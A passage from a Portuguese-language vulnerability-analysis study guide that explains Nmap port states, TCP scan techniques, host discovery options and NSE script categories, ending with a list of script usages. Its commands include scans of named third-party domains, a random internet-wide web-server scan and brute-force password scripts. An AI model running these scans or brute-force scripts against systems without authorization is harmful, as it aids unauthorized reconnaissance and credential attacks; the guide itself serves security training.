www.clubedohacker.com.br

219

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Aqui vemos que a placa clonada j esta funcionando corretamente.


Agora s utilizar o programa de sua preferncia para capturar os
pacotes ou mesmo utilizar a rede com o endereo MAC clonado.
Lembramos que h fortes implicaes legais se voc utilizar qualquer
destas tcnicas para algo ilcito, como se passar por outra pessoa, etc. Se
utilizar essas tcnicas dentro da empresa sem as devidas autorizaes
por escrito voc pode inclusive ser demitido por justa causa.

As Ferramentas do Backtrack Linux e Kali


Como j sabemos o conceito de analise de vulnerabilidades e as
tcnicas de forma conceitual, alguns servios de redes, as informaes
necessrias sobre uma boa analise de vulnerabilidades conhecemos
um pouco mais sobre o sistema Linux e mais objetivamente o

www.clubedohacker.com.br

220

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Backtrack, bem como o Kali! Ta na hora de conhecer o poderoso
arsenal existente neles.
No irei apenas listar as ferramentas disponveis no, irei
percorrer todos os diretrios dentro do diretrio pentest do Backtrack,
(No Kali no ser necessrio percorrer os diretrios) descrever cada
uma das ferramentas mais importantes e ensinar a utilizao delas. Na
maioria delas irei ensinar sua utilizao e os comandos para sua
manipulao.

Dentro do diretrio pentest no Backtrack como se pode ver na


tela acima voc ir encontrar 24 diretrios que daro acesso a mais
algumas dezenas de diretrios separados por assunto. Como no sou
eu quem vai determinar o grau de importncia de cada um,

www.clubedohacker.com.br

221

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
considerando que todas as ferramentas aqui so muito importantes,
dependendo do contexto. Portanto! eu considero que voc deve
determinar o grau de importncia de cada uma de acordo com a tarefa
que pretende executar. Sendo assim, comearei e terminarei essa obra
sem nenhuma ordem de diretrios ou ferramenta. Procurarei mostrar e
ensinar a utilizao as principais dentre as mais de 300 ferramentas
disponveis.
Nmap: O canivete suo

Introduo ao NMAP
O Nmap a ferramenta de verificao mais popular usado na
Internet.
Criado por por Fyodor (http://www.insecure.org o nmap tem sido

www.clubedohacker.com.br

222

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
utilizado por milhares de profissionais pelo mundo inteiro. O site do
nmap: www.nmap.org a fonte oficial do namp. No site oficial voc
pode baixar o cdigo fonte e os binrios do nmap e do zenmap. O
cdigo fonte distribudo em arquivos .tar comprimidos como gzip e
bzip2, e os binrios esto disponveis para Linux, Windows, MAC OS
X e imagem de disco .dmg.
No minha pretenso fazer desse tpico um guia de referencia
sobre NMAP, se voc quer conhecer tudo sobre essa maravilhosa
ferramenta de redes eu aconselho a leitura do livro Exame de Redes
com NMAP (do mesmo autor da ferramenta e lanado no Brasil pela
Editora Cincia Moderna) www.lcm.com.br inclusive eu aconselho
que o faa pois muitos administradores de sistemas e redes que eu
conheo j fizeram isso com o objetivo de tornar mais fcil suas
tarefas de inventrio, gerenciamento de agenda de atualizaes etc.
Voc no pode deixar de estudar tambm as RFCs 793, 792,
1122, 786 e as demais referente a pilha TCP/IP disponveis em
http://www.rfc-editor.org/ .
O NMAP usa pacotes crus de IP para determinar quais
maquinas esto disponveis na rede, quais servios esto sendo
oferecidos, quais os sistemas operacionais, quais os tipos de filtros de
segurana esto sendo aplicados etc.

www.clubedohacker.com.br

223

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Segundo seu idealizador (Fyodor), ele foi projetado para
examinar rapidamente, grandes redes, mas funciona bem se voc
deseja examinar uma nica maquina. Com a facilidade de rodar em
diversos sistemas operacionais, tais como Windows, Linux e demais
sistemas do mercado o Nmap tem sido um grande aliado dos
administradores de redes e analistas de segurana.

Fundamentos do escaneamento de portas


Embora o Nmap tenha crescido em funcionalidade ao longo dos
anos, ele comeou como um eficiente scanner de portas, e essa
permanece sua funo principal. O simples comando nmap <alvo>
escaneia mais de 1600 portas TCP no host <alvo>. Embora muitos
scanner de portas tenham tradicionalmente agrupado todas as portas
nos estados aberto ou fechado, o Nmap muito mais granular. Ele
divide as portas em seis estados: aberto(open),
fechado(closed),filtrado(filtered), no-filtrado(unfiltered),
open|filtered, ou closed|filtered.
Esses estados no so propriedades intrnsecas da porta, mas
descrevem como o Nmap as v. Por exemplo, um scan do Nmap da
mesma rede como alvo pode mostrar a porta 135/tcp como aberta,

www.clubedohacker.com.br

224

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
enquanto um scan ao mesmo tempo com as mesmas opes, partir
da Internet poderia mostrar essa porta como filtrada.

Os seis estados de porta reconhecidos pelo Nmap


Aberto (open) : Quando uma aplicao est em execuo e
aceitando conexes TCP ou pacotes UDP nesta porta. exatamente
esse o objetivo de Invasores e profissionais de avaliao de
segurana. Encontrar portas abertas para explorao. J a funo dos
administradores de fechar ou proteger com firewalls, mais sem
torn-las indisponveis para os usurios legtimos.
Fechado (closed) : Uma porta fechada est acessvel (ela recebe
e responde a pacotes de sondagens do Nmap), mas no h nenhuma
aplicao ouvindo nela. Elas podem ser teis para mostrar que uma
mquina est ligada. Nesse caso daria pra descobrir o sistema
operacional e outras informaes sobre o alvo
Filtrado (filtered) : Quando o Nmap no consegue determinar
se a porta est aberta porque uma filtragem de pacotes impede que as
sondagens alcancem a porta. Esse filtros podem ser implementados
com firewalls dedicado ou de host e roteadores.

www.clubedohacker.com.br

225

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
No-filtrado (unfiltered) : O estado no-filtrado significa que
uma porta est acessvel, mas que o Nmap incapaz de determinar se
ela est aberta ou fechada.
open|filtered : O Nmap coloca portas neste estado quando
incapaz de determinar se uma porta est aberta ou filtrada.
closed|filtered: Este estado usado pelo Nmap pra informar
que no foi incapaz de determinar se uma porta est fechada ou
filtrada.
Comunicao TCP
TCP Flags de comunicao: As comunicaes padro TCP
so controladas por bandeiras (flags) no cabealho do pacote TCP. Os
sinalizadores so: Synchronize: Sincronizar - tambm chamado de
"SYN" Usado para iniciar uma conexo entre os hosts.
Acknowledgement: Reconhecimento - tambm chamado de
"ACK" -Utilizadas para estabelecer uma conexo entre os hosts.
Push: Push - "PSH" - Instrui o sistema de recepo para enviar todos
os dados em buffer imediatamente. Urgent: Urgente "URG" Estado
que os dados contidos no pacote deve ser processado imediatamente.
Finish: Concluir, tambm chamado de "FIN", Diz ao sistema
remoto que nao ha mais nada a transmitir. Reset: Reset, tambm
chamado de "RST", Tambm usado para retomar uma conexo.

www.clubedohacker.com.br

226

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Ex: Three Way Handshake
Computer A

Computer B

192.168.0.2:2342 <---syn--->192.168.0.3:80
192.168.0.2:2342 <---syn/ack--->192.168.0.3:80
192.168.0.2:2342<---ack--->192.168.0.3:80
Conexo estabelecida
O Computador A (192.168.1.2) inicia uma conexo com o
servidor (192.168.1.3), atravs de um pacote com apenas um conjunto
sinalizador SYN.
O servidor responde com um pacote com ambos os SYN e a
flag ACK.
Para a etapa final, o cliente responde de volta o servidor com
um nico pacote ACK. Se estas trs etapas forem concludas, sem
complicao, ento uma conexo TCP foi estabelecida entre o cliente
e o servidor.
Tcnicas de varredura com Nmap
Sero citados de forma sucinta apenas alguns tipos de varredura
para que possamos executar uma analise em nossos sistemas de forma
efetiva e encontra as possveis vulnerabilidades. Essas tcnicas foram

www.clubedohacker.com.br

227

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
extradas da documentao oficial do Nmap e podem ser lidas por
inteiro em no site oficial www.insecure.org ou adquirindo o livro
oficial em www.lcm.com.br
-sS - scan TCP SYN : O scan SYN a opo de scanner
padro e mais popular de todas.com ela voc pode fazer
escaneamento de milhares de portas por segundo em uma rede que
no esteja bloqueada por filtros de segurana. Considerando que ela
no completa uma conexo TCP. Voc envia um pacote SYN, como
se fosse abrir uma conexo real e ento espera uma resposta.
Um SYN/ACK que indica que a porta remota est ouvindo,
caso venha um reset (RST ) ao invs do SYN/ACK ela no esta
ouvindo. J se nenhuma resposta for recebida, a porta ser marcada
como filtrada.
-sT - scan TCP connect : O mtodo de scan TCP connect
padro do TCP. til quando o usurio no tem privilgios para criar
pacotes em estado bruto. Ao invs de criar pacotes em estado bruto, o
Nmap pede ao sistema operacional para estabelecer uma conexo com
a mquina e a porta alvos enviando uma chamada de sistema connect
-sU - scans UDP : O mtodo de scan de UDP ativado com a
opo -sU. Ele pode ser combinado com algum tipo de escaneamento
TCP como o scan SYN (-sS) para testar ambos protocolos ao mesmo

www.clubedohacker.com.br

228

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
tempo. O scan UDP funciona enviando um cabealho UDP vazio para
cada porta de destino. Se um erro ICMP de porta inalcanvel for
retornado, a porta est fechada. Outros erros do tipo inalcanvel (tipo
3, cdigos 1, 2, 9, 10, ou 13) marcam a porta como filtrada.
Ocasionalmente um servio ir responder com um pacote UDP,
provando que est aberta. Se nenhuma resposta for recebida a porta
classificada como aberta|filtrada
-sN; -sF; -sX (scans TCP Null, FIN, e Xmas) : Esses trs
mtodos exploram uma falha na RFC 793 do TCP para que traduz a
diferena entre portas abertas e fechadas. Quando se escaneia
sistemas padronizados com o texto desta RFC, qualquer pacote que
no contenha os bits SYN, RST, ou ACK ir resultar em um RST
como resposta se a porta estiver fechada, e nenhuma resposta se a
porta estiver aberta.
Contanto que nenhum desses trs bits estejam includos,
qualquer combinao dos outros trs (FIN, PSH e URG) vlida. O
Nmap explora isso com trs tipos de scan: scan Null (-sN) No marca
nenhum bit (o cabealho de flag do tcp 0). scan FIN (-sF) Marca
apenas o bit FIN do TCP e scan Xmas(-sX) Marca as flags FIN, PSH
e URG.

www.clubedohacker.com.br

229

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Esses trs tipos de scan so exatamente os mesmos em termos
de comportamento, exceto pelas flags TCP marcadas no pacotes de
sondagem. Se um pacote RST for recebido, a porta considerada
fechada, e nenhuma resposta significa que est aberta|filtrada. A porta
marcada como filtrada se um erro ICMP do tipo inalcanvel (tipo
3, cdigo 1, 2, 3, 9, 10, ou 13) for recebido.
-sA - scan TCP ACK : Esse scan um pouco diferente pelo
porque ele nunca determina se uma porta est aberta ou
aberta|filtrada). Ele utilizado para mapear conjuntos de regras do
firewall, determinando se eles so orientados conexo ou no e
quais portas esto filtradas.
-sW - scan da Janela TCP : Scan da Janela a mesma coisa
que scan ACK, exceto pelo fato de que ele explora um determinado
detalhe da implementao de certos sistemas para diferenciar as
portas abertas das fechadas.
Alguns exemplos prticos
Stealth Scan
Computer A

Computer B

192.168.0.2:2342 <---syn--->192.168.0.3:80

www.clubedohacker.com.br

230

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
192.168.0.2:2342 <---syn/ack--->192.168.0.3:80
192.168.0.2:2342<---RST--->192.168.0.3:80
O cliente envia um unico pacote SYN para o servidor na porta
escolhida de acordo com o servio a ser utilizado. Se a porta estiver
aberta, o servidor responde com um pacote SYN/ACK. Se o servidor
responder com um pacote RST, porque a porta remota est fechada.
O cliente envia um pacotes RST para fechar a abertura antes que uma
conexo possa ser estabelecido. Essa varredura tambm conhecida
como "half-open" scan.
Xmas Scan
Computer A

Computer B

Xmas scan dirigida a uma porta aberta


192.168.5.92:4031 ---FIN/URG/PSH--->192. 168.5.110:23
192. 168.5.92:4031 <---NO RESPONSE---192. 168.5.110:23
Xmas scan dirigida a uma porta fechada
192. 168.5.92:4031 ---FIN/URG/PSH--->192. 168.5.110:23
192.5.5.92:4031<---RST/ACK---192.5.5.110:23

www.clubedohacker.com.br

231

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Nota: O Xmas scan s funciona se a implementao do sistema
for desenvolvida de acordo com a RFC 793. E o Xmas scan no
funcionar contra qualquer verso atual do Microsoft Windows. Pois
a Microsoft nao segue a RFC 793 em sua implementao para o
Windows. Se voc tentar essa tecnica contra esses sistemas, vai
receber em resposta. Todas as portas do host remoto esto fechadas.
FIN Scan
Computer A

Computer B

Scan FIN dirigida a porta aberta


192.168.5.92:4031 <---FIN--->192.168.5.110:23
192.168.5.92:4031 <---NO RESPONSE--->192.168.5.110:23
Scan FIN dirigida a porta fechada
192.168.5.92:4031< ---FIN--->192.168.5.110:23
192.168.5.92:4031<---RST/ACK--->192.168.5.110:23
Nota: O scan FIN s funciona se a implementao do sistema
for desenvolvida de acordo com a RFC 793. E no no vai funcionar
contra qualquer verso atual do Microsoft Windows. Ele ir retornar a
mesma resposta do Xmas Scan.

www.clubedohacker.com.br

232

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
NULL Scan
Computer A

Computer B

NULL scan dirigida a porta aberta


192.5.5.92:4031 <---NO FLAGS SET--->192.5.5.110:23
192.5.5.92:4031 <---NO RESPONSE--->192.5.5.110:23
NULL scan dirigida a porta fechada
192.5.5.92:4031 <---NO FLAGS SET--->192.5.5.110:23
192.5.5.92:4031<---RST/ACK--->192.5.5.110:23
Nota: NULL scan s funciona se a implementao do sistema
for desenvolvida de acordo com a RFC 793 e seguir a mesma regra
para as duas tcnicas anteriores..
Agora que temos uma boa ideia dos conceitos bsicos de Nmap,
vamos praticar um pouco.
Encontre servidores web aleatoriamente com o comando #nmap -sS
-PS80 -iR 0 -p80

www.clubedohacker.com.br

233

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Nesse exemplo o nmap vai varrer a internet em busca de


servidores web. Essa no uma prtica aconselhada porque demanda
muito recurso de hardware e no define um objetivo.
Traceroute com nmap
Em uma analise de vulnerabilidades, especificamente na parte
de reconhecimento poder haver necessidades de observao da
quantidade de saltos que um pacote daria at chegar determinado
alvo. Isso ganha mais importncia ainda quando voc precisa observar
por onde esse pacote est passando, por quais roteadores, quem so o
proprietrios etc.

www.clubedohacker.com.br

234

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
O comando de rede padro no Windows tracert e em Linux
traceroute, mas pra quem tem nmap no precisa se preocupar, pois ele
traa rota com mais eficincia.
nmap -PN -T4 --traceroute www.clubedohacker.com.br

www.clubedohacker.com.br

235

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
No exemplo acima podemos ver a rota por onde passariam
meus pacotes em uma tentativa de acesso a um dos meus sites. A tela
foi recortada para melhor compreenso.
Exame de lista: -sL
O exame de lista uma forma interessante e muito til pra voc
descobrir os alvos. Pois com essa tcnica o namp lista cada host nas
redes especificadas, sem enviar nenhum pacote ao host alvo.
Por padro o nmap faz tambm a resoluo de DNS reverso nos
hosts para descobrir os seus nomes. O nmap tambm ir relatar o
nmero total de endereos IP no final.
O exame de lista um excelente cheque de sanidade para que
voc possa assegurar-se de que est com os endereos IP corretos
para seus alvos, evitando assim a possibilidade de est analisando o
alvo errado.
Por exemplo, se os hosts simularem nomes de domnio que voc
no reconhea, valer a pena investigar mais a fundo principalmente
quando voc est analisando hosts em rede corporativa.
Esses cuidados vo evitar que voc faa buscas em hosts de
rede da empresa errada. Um bom exemplo de exame de lista seria:
#nmap -sL www.clubedohacker.com.br

www.clubedohacker.com.br

236

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Exame por ping com nmap: -sP


Essa opo diz ao nmap para realizar somente um exame por
ping e depois exibir os hosts que responderem como disponveis.

www.clubedohacker.com.br

237

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
exemplo: #nmap -sP -T4 www.clubedohacker.com.br/24

No exemplo acima enviamos uma solicitao de eco de ICMP e


um pacote TCP ACK para a porta 80. Observao se voc tiver
logado como usurio sem privilgios do unix e ou sem a biblioteca
winpcap instalada no Windows voc no poder enviar esses pacotes
crus, somente um pacote SYN enviado. Nesses casos o pacote SYN
enviado usando-se uma chamada de conexo TCP do sistema
porta 80 do alvo.
Tcnicas de descobertas de hosts
A muito tempo atrs a descoberta de hosts era bem mais fcil,
bastava um endereo IP registrado para um host ficar ativo, nesse
caso enviaramos um pacote ICMP de requisio de eco "ping" e era

www.clubedohacker.com.br

238

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
s aguardar uma resposta. Os firewalls raramente bloqueavam essas
requisies e a grande maioria das mquinas respondiam de maneira
obediente, pois era uma exigncia desde 1989 pela RFC 1122, que
afirmava tacitamente "Todo host dever implementar uma funo
servidora de eco ICMP que receba solicitaes de eco e envie
correspondente resposta de eco. Ex: #nmap -sP -PE -R -v
eleicaosuja.com.br concerte.com.br adonelbezerra.com.br

- Aqui usamos um exemplo de ICMP puro do nmap em 3 sites de


minha propriedade. As opes -sP -PE especificam um exemplo de
ping ICMP puro.

www.clubedohacker.com.br

239

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
-R diz ao nmap para realizar a resoluo de DNS reverso em todos os
hosts, mesmo os que estiverem fora do ar.

Ping por TCP SYN (-PS<lista de portas>)


A opo -PS envia um pacote TCP vazio, com o sinalizador SYN
ligado.
A porta padro de destino a 80, mas pode ser configurada
outra porta na hora da compilao do nmap, (caso voc tenha optado
por utilizar o cdigo fonte bruto). As mudanas pode ser feitas em
DEFAULT_TCP_PROBE_PORT_SPEC no arquivo nmap.h
Exemplo: -PS22,80,113,1050,35000 nos casos em que as provas
sero executadas em cada porta em paralelo, o sinalizador SYN
sugere ao sistema remoto que voc est tentando estabelecer uma
conexo. Normalmente a porta de destino estar fechada e um pacote
RST ser enviado de volta.
Se a porta estiver aberta, o alvo dar o segundo passo de uma
saudao TCP de trs tempos, respondendo com um pacote TCP
SYN/ACK. Nesse caso a sua mquina que est rodando o nmap ir
cortar a conexo iniciada respondendo com um RST em vez de

www.clubedohacker.com.br

240

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
enviar o pacote ACK que completaria a saudao de trs tempos e
estabeleceria a conexo completa.
O mais importante nisso tudo que o nmap no se preocupa se
a porta est aberta ou fechada. Qualquer das respostas, seja RST ou
SYN/ACK confirmar para o nmap que a mquina alvo est
disponvel.
Exemplo: #nmap -sP -PE -R -v microsoft.com adonelbezerra.com.br
google.com
Ping por TCP ACK: -PA + <lista de portas>
O ping por TCP ACK similar ao ping por SYN, a diferena
que o sinalizador de TCP ACK est ligado, no lugar do sinalizador
SYN. Um pacote ACK supe est reconhecendo dados atravs de
uma conexo TCP estabelecida, mas essa conexo no existe. Assim
a mquina alvo dever sempre responder com um pacote RST,
revelando sua existncia nesse processo.
A opo -PA usa a mesma porta padro que a porta SYN que
nesse caso a porta 80, mas tambm pode receber uma lista de portas
de destino, no mesmo formato. A razo para se executar ambas as
provas de ping por SYN e por ACK maximizar as chances de
ultrapassagem de algum firewalls que por ventura esteja de guarda.

www.clubedohacker.com.br

241

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
A questo que muitos administradores ainda configuram
roteadores e firewalls simples para bloquear pacotes SYN que
chegam, exceto por aqueles destinados a servios pblicos, como
websites, servidores ftp, servidores de e-mail etc. Isto evita a chegada
de outras conexes empresa, mas permitem que os usurios faam
conexes de sada livremente com a internet. ex: nmap -sP -PA
www.eleicaosuja.com.br
Ping de UDP (-PU<lista de portas)
Uma outra opo de descoberta de host o ping de UDP, que
envia um pacote vazio para determinadas portas portas do protocolo
UDP. A lista de portas usa o mesmo formato das opes -PS e -PA,
mas se nenhuma porta for especificada, ser utilizada a porta padro
31338. Esta porta padro tambm pode ser configurada na
compilao do nmap, no arquivo
DEFAULT_UDP_PROBE_PORT_SPEC em nmap.h.
Ao atingir uma porta fechada na mquina alvo, a prova de UDP
dever induzir o retorno de um pacote ICMP de porta inalcanvel.
Isto significa para o nmap, que a mquina est no ar e disponvel.
Muitos outros tipos de ICMP, tais como rede ou mquina no
alcanvel ou TTL excedido so indicadores de uma mquina fora do
ar ou inalcanvel.

www.clubedohacker.com.br

242

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
A falta de uma resposta tambm interpretada como alvo
disponvel, pois se uma porta aberta for alcanada, a maioria dos
servios simplesmente ignora o pacote vazio e falham em retornar
qualquer resposta. por isso que a porta padro dessa tcnica a
31338, que totalmente improvvel de estar em uso.
Umas das vantagens tipo de tcnica que ela dribla firewalls e
filtros quando esto configurados pra filtrarem somente TCP.
Outros tipos de ping de ICMP (-PE, -PP, e -PM)
Alm dos tipos comuns de descoberta de mquina por TCP e
UDP, o nmap pode enviar os pacotes padres enviados pelo programa
ping tradicional presente em todo sistema operacional.
O nmap envia um pacote ICMP tipo 8 (requisio de eco) ao
alvo, e aguarda por uma resposta de tipo 0 (resposta de eco). Muitos
firewall bloqueiam estes tipos de pacotes para no responderem de
acordo com a determinao da RFC 1122. por isso que exames de
ICMP raramente so confiveis. Mas para administradores de
sistemas que esto monitorando uma rede interna, esta pode ser uma
abordagem muito eficiente. Bastando para isso usar a opo -PE para
habilitar este comportamento de requisio de eco.

www.clubedohacker.com.br

243

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Embora a requisio de eco seja a consulta padro do ping
ICMP, o nmap no se limita a isso, ele vai alem do padro do ICMP
descrito na (RFC 792).
Ping de protocolo IP ( -PO<lista de protocolos>
Outra opo de descoberta de host usando o ping de protocolo
IP, que envia pacotes IP com nmero de protocolos especificado
ajustado em seus cabealhos IP. A lista de protocolos usa o mesmo
formato das listas de portas das opes de descoberta de host por TCP
e UDP. Se nenhum protocolo for especificado, por padro sero
enviados mltiplos pacotes de IP para ICMP (protocolo 1), IGMP
(protocolo 2) e IP- para IP (protocolo 4).
Os protocolos padro tambm pedem ser configurados durante
a compilao do nmap alterando-se
DEFAULT_PROTO_PROBE_PORT_SPEC no arquivo nmap.h.
Este mtodo de descoberta de host procura por qualquer
resposta usando o mesmo protocolo como prova, ou mensagens de
inalcanvel do protocolo ICMP, o que significa que tal protocolo no
suportado pelo host de destino. E qualquer tipo de resposta significa
que a mquina alvo est ativa.

www.clubedohacker.com.br

244

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Mecanismo de scripts do nmap
At aqui foi discutido item a item do nmap, claro que ainda
faltam muita coisa a ser explorada desse fabuloso scanner, se que
ele pode ser chamado de scanner com tantas funcionalidades.
Aqui fecharemos com uma que eu considero das mais
importantes, pois o mecanismo de script do namp simplesmente
extraordinrio ao juntar cadeias de comandos e ao serem disparados
ira nos retornar o resultado de forma extremamente fcil de
interpretar.
De forma pratica voc pode selecionar um dos mais de 60
scripts em sua base e com atualizao constante, de forma muito
simples, assim como simples de usar todo o nmap. Basta digitar -script = selecionar um script especifico
As categorias de scripts
Os scripts NSE so definidos pela categoria a que pertencem,
listei aqui as principais para melhor entendimento.
*auth = autenticao: - Esses scripts tentam descobrir credenciais
de autenticao no sistema alvo, normalmente atravs de ataques de
fora bruta.

www.clubedohacker.com.br

245

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
*discovery = descoberta: - Esses scripts tentam ativamente descobrir
mais sobre a rede, consultando registros pblicos, dispositivos
habilitados ao SNMP, servios de diretrios. Ex.1: html-title que
obtm o titulo do caminho na raiz de um website. Ex.2:O smb-enumshares que enumera compartilhamentos do windows. Ex.3: snmpsysdescr que extrai detalhes do sistema atravs do SNMP.
*version = verso: - Os scripts nessa categoria especial so uma
extenso da funcionalidade da deteco de verso e no podem ser
selecionados explicitamente. Eles so selecionados para execuo
somente se deteco de verso (-sV) for solicitada. A sada deles no
podem ser distinguidas da sada de deteco de verso e eles no
produzem resultados de scripts de servios ou de host. Ex: so o
skypev-2-version, o pptp-version e o iax2-version.
*vuln = verso: -Estes scripts checam vulnerabilidades especficas
conhecidas e, geralmente, s reportam resultados se elas forem
encontradas. EX: realvnc-auth-bypass e o xampp-default-auth
*default = padro: - Esses scripts so o conjunto padro e so
executados quando usamos as opes -sC ou -A, ao invs de listar os
scripts com script. Essa categoria pode ser especificada
explicitamente, como qualquer outra, usando-se --script=default.

www.clubedohacker.com.br

246

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
*external = externos: - Os srcipts desta categoria podem enviar
dados a bases de dados de terceiros ou outros recursos de rede.
*intrusive = intrusivos: - Alguns scripts so muito intrusivos,
porque usam recursos significativos no sistema remoto, podendo at
derrubar o sistema ou servio. Normalmente so percebidos
facilmente como ataque pelos administradores.
*malware = - Estes scripts testam se a plataforma est infectada por
malwares ou backdoors. Exemplos: o smtp-strangeport, que observa
servidores SMTP rodando em nmeros de portas incomuns e o authspoof que detecta servidores de simulao de identd que fornecem
uma resposta falsa, antes mesmo de receberem uma consulta. De
acordo com a documentao oficial do nmap: Esses comportamentos
so interpretados como indicativos de infeces de malwares.
*safe = seguros : - Scripts que no foram projetados para derrubar
servios, usar grande quantidade de largura de banda da rede ou
outros recursos, ou explorar brechas de segurana so categorizados
como safe.
Vamos a alguns exemplos prticos de utilizao dos scripts do
nmap. Primeiro analisaremos uma maquina protegida em relao a
uma determinada vulnerabilidade.

www.clubedohacker.com.br

247

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Os resultados sero divididos em trs telas distintas para que
voc possa analisar do inicio ao fim.

Nessa tela temos o comando bruto sendo executado. Onde nmap


a chamada padro -v verbose serve para mostrar o resultado na tela -script para selecionar o script, smb para selecionar a categoria do
script e por fim o script check-vulns para checar uma vulnerabilidade
especifica e o alvo logo em seguida. Nesse caso o alvo poderia ser o
seguimento de rede inteiro bastando para isso digitar 192.168.0.0/24.

www.clubedohacker.com.br

248

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Aqui ns temos a execuo normal do script.

www.clubedohacker.com.br

249

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Nessa ultima tela temos o resultado final informando que


apenas da possibilidade de outras vulnerabilidades, esse sistema no
esta vulnervel nesse momento a esse problema especifico.
Agora analisaremos uma maquina apontada pelo mesmo script
do nmap como vulnervel.

www.clubedohacker.com.br

250

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

os procedimentos usados anteriormente para testar a maquina que no


estava vulnervel tambm foram utilizados aqui. A nica diferena
esta no resultado obtido.
Lista de scripts
Localizar a sintaxe de utilizao dos scripts do nmap, bem como sua
localizao muito simples. A Localizao
/usr/share/nmap/scripts
Para melhor compreenso, estou copiando aqui as referencias e a
sintaxe da maioria dos scripts disponveis no NMAP.
Claro que no esto todos relacionados, mais a grande
maioria sim.

www.clubedohacker.com.br

251

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Lembre-se que analise de vulnerabilidade significa conhecimento
amplo sobre o alvo e o NMAP decisivo nesse aspecto,
portanto, o domnio completo dessa ferramenta
fundamental.

"Legenda"
@usage =(Sintaxe para utilizao)
description = (Descrio resumida do script)

description = Performs password guessing against Apple Filing


Protocol (AFP).
@usage
nmap -p 548 --script afp-brute <host>

description = Retrieves the authentication scheme and realm of an


AJP service (Apache JServ Protocol) that requires
authentication.
@usage
-- nmap -p 8009 <ip> --script ajp-auth [--script-args ajpauth.path=/login]

www.clubedohacker.com.br

252

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
description = Performs brute force passwords auditing against the
Apache JServ protocol.
@usage
nmap -p 8009 <ip> --script ajp-brute

description = Performs a HEAD or GET request against either the


root directory or any optional directory of an Apache
JServ Protocol server and returns the server response
headers.
@usage
nmap -p 8009 <ip> --script ajp-headers

description = Discovers which options are supported by the AJP


(Apache JServ Protocol) server by sending an OPTIONS
request and lists potentially risky methods.
http://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_
XST_%28OWASP-CM-008%29
@usage
nmap -p 8009 <ip> --script ajp-methods

description = Requests a URI over the Apache JServ Protocol and


displays the result (or stores it in a file). Different AJP

www.clubedohacker.com.br

253

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
methods such as; GET, HEAD,TRACE, PUT or DELETE
may be used.
@usage
nmap -p 8009 <ip> --script ajp-request

description = Gathers information (a list of all server properties) from


an AMQP (advanced message queuing protocol) server.
See http://www.rabbitmq.com/extensions.html for details on the
<code>server-properties</code> field.
@usage
nmap --script amqp-info -p5672 <target>

description = Maps IP addresses to autonomous system (AS)


numbers.
@usage
nmap --script asn-query [--script-args dns=<DNS server>]
<target>
-- @args dns The address of a recursive nameserver to use (optional).

description = Performs brute force password auditing against the


BackOrifice
service.
The
<code>backorifice-

www.clubedohacker.com.br

254

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
brute.ports</code> script argument is mandatory (it
specifies ports to run
the script against).
@usage
nmap

